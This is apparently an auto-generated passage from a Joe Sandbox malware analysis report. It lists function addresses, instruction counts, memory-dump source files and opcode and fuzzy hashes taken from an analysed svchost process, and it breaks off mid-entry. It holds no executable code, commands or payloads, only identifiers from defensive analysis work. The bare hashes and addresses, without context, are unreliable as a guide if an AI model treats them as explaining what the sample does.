                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                            • Instruction ID: 368a86fe7e59a70ae6a517a23032af5f1cbac8e956bde417cc8636ddd118d208
                                                                                            • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                            • Instruction Fuzzy Hash: 02F0C8372447329BC732D75D4984F6FEDA58FC5AB4F190437E5099F244CA648C0156D0
                                                                                            Function 03B05152 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a8c757f401af9b8aad867acdab572207c945558e8645fc443047324612908314
                                                                                            • Instruction ID: 244cabd135d62c22107a0457f215ad1f84585de6a7db30a1e7b7116f5ae2fe70
                                                                                            • Opcode Fuzzy Hash: a8c757f401af9b8aad867acdab572207c945558e8645fc443047324612908314
                                                                                            • Instruction Fuzzy Hash: 61012175A10209ABDB00DF69D9419EEBBB8FF49304F14405AE500E7380D6749A018BA1
                                                                                            Function 03B050D9 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0c5d66da2ce653d483f3172c78d6f70a16605179b5f5aeb6c4c10194c1eb9f6
                                                                                            • Instruction ID: d9f08c81fdfbbf6bbe599d904ef22ccb8d2e73b3290b06cce8bc11cedde8f919
                                                                                            • Opcode Fuzzy Hash: a0c5d66da2ce653d483f3172c78d6f70a16605179b5f5aeb6c4c10194c1eb9f6
                                                                                            • Instruction Fuzzy Hash: B1012175A0030DABDB00DF69D9459EEBBB8EF49304F50405AE500F7380D67499018BA1
                                                                                            Function 03B05060 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 18272093ab2be0949183936700a6989f2d5ad41d5ce07f0c2bc1f051c477ee53
                                                                                            • Instruction ID: 2aaea022f879c4970b807fd3aa70bdcb40d1862f5a0bb96c977a102bb6ade968
                                                                                            • Opcode Fuzzy Hash: 18272093ab2be0949183936700a6989f2d5ad41d5ce07f0c2bc1f051c477ee53
                                                                                            • Instruction Fuzzy Hash: 27012175A103099BDB04DF69DA819EEBBB8EF49304F10405AF501EB381D674AA018BA1
                                                                                            Function 03A5C073 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                            • Instruction ID: b8cb4db9df78cf46f588b48bd84d9a8d084f618b85617e0a675e1aa49731a42e
                                                                                            • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                            • Instruction Fuzzy Hash: F3F0C2B3A00610ABD324CF4DDD40E57F7EADBC0A90F08812EA905CB320EA31DD05CB90
                                                                                            Function 03A65734 Relevance: .0, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                            • Instruction ID: 20e20ffd4aaa5b1fe9642b71c9415c759a8b9771f0847c40a58dd8244d1d99ce
                                                                                            • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                                                            • Instruction Fuzzy Hash: 9DF0FF72A01214AFE319CF5CC940F6AF7EDEB46650F09407AD500DB230E671DE04CA94
                                                                                            Function 03AEF78A Relevance: .0, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a764a145609fbc753075d1a20e732e999399882f46177dac8e974547751ac03
                                                                                            • Instruction ID: a47382eea74cb12c64d764e1c41e1c75aa518cc41b0cdcbadb49dd4705a7f4f8
                                                                                            • Opcode Fuzzy Hash: 7a764a145609fbc753075d1a20e732e999399882f46177dac8e974547751ac03
                                                                                            • Instruction Fuzzy Hash: 91010CB4E00749AFCB44DFA9D545AAEBBF4EF48304F11806AA855EB381E674DA00DB91
                                                                                            Function 03AB63C0 Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                            • Instruction ID: 335c7ebc0b56f9dc14696a5dadf655d2fd3fe79158e561a7b54d60f7a8691421
                                                                                            • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                            • Instruction Fuzzy Hash: CDF01D7620011DBFEF019F94DE80DEFBB7DEB59298B104125FA1196170D731DD21ABA0
                                                                                            Function 03AEF2F8 Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bf448e02fe1e66fd0f7b2a16a44b26e941c0045ca4e8cddd849c5824c191c41a
                                                                                            • Instruction ID: 154b60ed44c8affb2bd8e57b03a36b87f48db01116ff1796c7864cdf67ea741a
                                                                                            • Opcode Fuzzy Hash: bf448e02fe1e66fd0f7b2a16a44b26e941c0045ca4e8cddd849c5824c191c41a
                                                                                            • Instruction Fuzzy Hash: B6F0A476A10348AFDB04DBB9C945AAEB7B8EF44710F00805BE511EB280DA74DA018791
                                                                                            Function 03B061E5 Relevance: .0, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2c269547765d3a2dd13818bab8e48e2ca5bdac2b03c30ea6c51009e31f7a6b7d
                                                                                            • Instruction ID: 68e25f42139357f4bbad57af540a46dc178041918628f63f851410c5bda78b12
                                                                                            • Opcode Fuzzy Hash: 2c269547765d3a2dd13818bab8e48e2ca5bdac2b03c30ea6c51009e31f7a6b7d
                                                                                            • Instruction Fuzzy Hash: AA012C75A002599BDB04DFA9D945AAEBBB8FF48314F14406AE501AB380D778AA01CB95
                                                                                            Function 03A6724D Relevance: .0, Instructions: 40COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                            • Instruction ID: 39dd611ef6022837379d7785dd480d0cd67b4aee8731f6082bdeddb6314e9b8c
                                                                                            • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                            • Instruction Fuzzy Hash: BEF0FC75A213556BDB18D7798940FABB7A8DF84714F08459BB9029B240DA31D940C750
                                                                                            Function 03B053FC Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 16a159de9f277c120a734007c4b26e642358c6d019b3a6cf10f68d946351f82f
                                                                                            • Instruction ID: 0228fd72447fb09baf68f5a7b202a53a2c41b0987b9bfc15bfff00d143ff7dfc
                                                                                            • Opcode Fuzzy Hash: 16a159de9f277c120a734007c4b26e642358c6d019b3a6cf10f68d946351f82f
                                                                                            • Instruction Fuzzy Hash: 31015A74A00209DFDB04DFA9C545B9EFBF4FF08304F0482AAA519EB381EA349A008B91
                                                                                            Function 03A2C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1aaa6f882998730be31c0c367c2a4cfc2acb6b41e1e84dea7bd626fb58b5120
                                                                                            • Instruction ID: 0bf5a89795d5d06e61c91cdb8afbd574c1a09d7b7f25a9d3dd65629342a4eac4
                                                                                            • Opcode Fuzzy Hash: a1aaa6f882998730be31c0c367c2a4cfc2acb6b41e1e84dea7bd626fb58b5120
                                                                                            • Instruction Fuzzy Hash: 50F0B4712043255BF714D75DAD02B667BAAEBC0761F29806BEB058F2D0FA71EC4183A4
                                                                                            Function 03B03749 Relevance: .0, Instructions: 38COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                            • Instruction ID: 242679b9bf93a3c5238942c0e85699314d958ab90854808c27c10d2843c4c417
                                                                                            • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                                                            • Instruction Fuzzy Hash: EEF04FBA940304BFE711EBA4CD41FDA77FCEB44714F100166A916DA2D0EA70AA44CB90
                                                                                            Function 03AD437C Relevance: .0, Instructions: 37COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                            • Instruction ID: efb955027b8e65a0d8b6b3a5ab5985aee7f51d0e6423636e625f49a39edd5bd7
                                                                                            • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                            • Instruction Fuzzy Hash: EAF0BE3A749B1287DB35EB2F8520A2AE296AF84A00B49052F9803CBB80DF30D8009790
                                                                                            Function 03AEF3E6 Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b410cd004dfa54344d66e17f3581bd4abafe994b753d0e6187e691ec8858921
                                                                                            • Instruction ID: 8b70ec4f32ddc7be9db3f551646989001fa90306880618274160b5b70c1d0e75
                                                                                            • Opcode Fuzzy Hash: 2b410cd004dfa54344d66e17f3581bd4abafe994b753d0e6187e691ec8858921
                                                                                            • Instruction Fuzzy Hash: E8F04F75A01348EFCB04EFA9DA45A9EB7F4EF58300F40806AB945EB381D674DA01CB55
                                                                                            Function 03A292FF Relevance: .0, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1a7c99277005009633fa1d619d8fbd635503e142ce4a2e4b886860de6503e8d
                                                                                            • Instruction ID: 797146a52f54416aab23155d738f4754403e5405fd88ba3f8bfb5db2c50b135f
                                                                                            • Opcode Fuzzy Hash: a1a7c99277005009633fa1d619d8fbd635503e142ce4a2e4b886860de6503e8d
                                                                                            • Instruction Fuzzy Hash: D1F0FA32200340ABD731EB09CE08F9BBBEDEF84B00F08012EA94683190C7A0A909C660
                                                                                            Function 03A347FB Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dfb632500084406fa95daede6d3799fe8515035826054c76bd46a701b3c10f06
                                                                                            • Instruction ID: 9483396a014365a0e81710263047f863fc043512364172cafe7c630508a92f08
                                                                                            • Opcode Fuzzy Hash: dfb632500084406fa95daede6d3799fe8515035826054c76bd46a701b3c10f06
                                                                                            • Instruction Fuzzy Hash: 83F0BE399127E49FD732CB6BC548B61B7D8DB0A764F0C89AFF48987641C764D881CA50
                                                                                            Function 03AEF6C7 Relevance: .0, Instructions: 33COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4a46f318d9e2c2fe75cbc791f75c1951b162018870994d98631c629eaec64aee
                                                                                            • Instruction ID: cc8e4f7b964f211a37d478392a9c0ef19987c0b06a34a57d373e65dfc20ba3a4
                                                                                            • Opcode Fuzzy Hash: 4a46f318d9e2c2fe75cbc791f75c1951b162018870994d98631c629eaec64aee
                                                                                            • Instruction Fuzzy Hash: 8CF06D79A10348EFDB04EFA9D955EAEB7F4EF48304F00406AE501EB381EA74DA01CB54
                                                                                            Function 03AF0115 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c9ed94aa2e45b5dc5c3d06883dbe7b7681d43796a27f2321c5731e6847bed85
                                                                                            • Instruction ID: f0fe6c4bfcaf9779305a55cc4ebde8500756a773662c32e3aedeb1fa696012e5
                                                                                            • Opcode Fuzzy Hash: 6c9ed94aa2e45b5dc5c3d06883dbe7b7681d43796a27f2321c5731e6847bed85
                                                                                            • Instruction Fuzzy Hash: 3FF0273A4167C04ECF32FB6866903D1BF58975A118F1D158FD6A15B606C9B48483C628
                                                                                            Function 03B0539D Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: df3f4b144618c593f4bf76c3e722b9829cebe9d61e4739b0431f71751371a18e
                                                                                            • Instruction ID: a8686020698d4ecdd599e830beedcce294fe4c1dbf5e30c8f63237742b660ca5
                                                                                            • Opcode Fuzzy Hash: df3f4b144618c593f4bf76c3e722b9829cebe9d61e4739b0431f71751371a18e
                                                                                            • Instruction Fuzzy Hash: E7F05474A1434C9FDB14EB79D545E6EB7B4EF48304F1084A6E502EB3C1DA74DA01CB65
                                                                                            Function 03B05283 Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f793b8822659d24f0f2cfa7545c4042845d7e8a657ef7f2b955e66223012c931
                                                                                            • Instruction ID: be3a8696d41d52c25e9478716312e8a9fdf7ab436fabdfffc18ec64efac5b1db
                                                                                            • Opcode Fuzzy Hash: f793b8822659d24f0f2cfa7545c4042845d7e8a657ef7f2b955e66223012c931
                                                                                            • Instruction Fuzzy Hash: BFF0B474A10308DBDB14EBA5DA45E6EB7B4FF04304F00446AA441EB3C1EA34D9008B50
                                                                                            Function 03B052E2 Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6584b024a7a24b63fabdf17cd116427f7c020bda76d7e13e9cd24dc6fbb9e797
                                                                                            • Instruction ID: bba30d62e3b0f0d79f64268220767b0a30a7ad23dd812a5a1234da843304a805
                                                                                            • Opcode Fuzzy Hash: 6584b024a7a24b63fabdf17cd116427f7c020bda76d7e13e9cd24dc6fbb9e797
                                                                                            • Instruction Fuzzy Hash: 4BF0B474A103489BDB14EFB5DA45E6EB7B4EF04304F04446AA401EB3C0DA74DA00CB54
                                                                                            Function 03B05341 Relevance: .0, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8ea71efe9a902dc11e2f20bc60f5f2287d9a33bd699f8fcaa5256dd0d64046ab
                                                                                            • Instruction ID: 550d48c5d2501edc3fb5a6699c1624780c5fcb7aa02c63a54cbce5dcdebee32f
                                                                                            • Opcode Fuzzy Hash: 8ea71efe9a902dc11e2f20bc60f5f2287d9a33bd699f8fcaa5256dd0d64046ab
                                                                                            • Instruction Fuzzy Hash: A3F02774A0430CEBCF14EBB9DA45E9EB7B8EF09304F1041AAE402EB3D0EA74DA008714
                                                                                            Function 03B05227 Relevance: .0, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5b425683458b36015aea062c3d5a734d17ef5387a4241251d6dc09c74b50c86d
                                                                                            • Instruction ID: 6ef104c3e5a4b18a213a6993d832ac2b19988d953ab54c741273b27ff2656376
                                                                                            • Opcode Fuzzy Hash: 5b425683458b36015aea062c3d5a734d17ef5387a4241251d6dc09c74b50c86d
                                                                                            • Instruction Fuzzy Hash: 7FF08274A14348ABDB14EBA9DA45E6EB7B8EF44704F0404AAA901EB3C1EA74D9018755
                                                                                            Function 03A67208 Relevance: .0, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9f45b5cf61fa98a58302badd4688afe0631e8a4380195cd2b4e2fea6d7e5a55b
                                                                                            • Instruction ID: 1c307cc8d6f9db428a611ada13e91b7745b30e3e1d434c668e2254853228184c
                                                                                            • Opcode Fuzzy Hash: 9f45b5cf61fa98a58302badd4688afe0631e8a4380195cd2b4e2fea6d7e5a55b
                                                                                            • Instruction Fuzzy Hash: 04F02773951A969FD721C32EC184B11B7D99F08774F0C80ABF4058F741CBA8CC80C251
                                                                                            Function 03B051CB Relevance: .0, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 45982d174c7a7194c462f46ca01dafdfc4752cddc91f5d6cee5f6d596fac5991
                                                                                            • Instruction ID: 50af4419705548532fd641c9c542bbcb829f6aab6fbdef7111521f89975bbbdb
                                                                                            • Opcode Fuzzy Hash: 45982d174c7a7194c462f46ca01dafdfc4752cddc91f5d6cee5f6d596fac5991
                                                                                            • Instruction Fuzzy Hash: 9FF08974A14248DBDB14EBA5DA45E6E77B4EF04308F040456A501DB3C1EA74D901C755
                                                                                            Function 03AAD070 Relevance: .0, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                            • Instruction ID: cc3639708699b33f3e217780a3bc053540b6ccfb31a02fb15b913a0ea473a169
                                                                                            • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                            • Instruction Fuzzy Hash: F4F0E53360461467C230AA0D8C05F5BFBACDBD5B70F10471ABA649B2D0DA70A911D7D6
                                                                                            Function 03AEF72E Relevance: .0, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 420dc8a6c2d171b249e6534ad8805fece9e7f7abfb581fd84e80b4676ba7a132
                                                                                            • Instruction ID: 97f1dec1c1cb2a0231a85d49e12b5e06522336799feb5dba1921d9b3f05c8eb6
                                                                                            • Opcode Fuzzy Hash: 420dc8a6c2d171b249e6534ad8805fece9e7f7abfb581fd84e80b4676ba7a132
                                                                                            • Instruction Fuzzy Hash: 29F08275A10348AFDB04EBA9DA59E9E77B8EF08704F05005AE541EB3C0D974D9019755
                                                                                            Function 03A30710 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction ID: d8b9f8f3ce6128362001d2ad11cd85a4320b1d83ba7fa17250fe40474574c3ba
                                                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                            • Instruction Fuzzy Hash: 38F06D7E204B44DBDB16DF1AD150AA57BA8EB46360F0444DAF8468B351EB31E982CB94
                                                                                            Function 03B037B6 Relevance: .0, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                            • Instruction ID: 3dcd295184362b39179723e88b3cd508f60b2b3fdb67deb98148697c0c983add
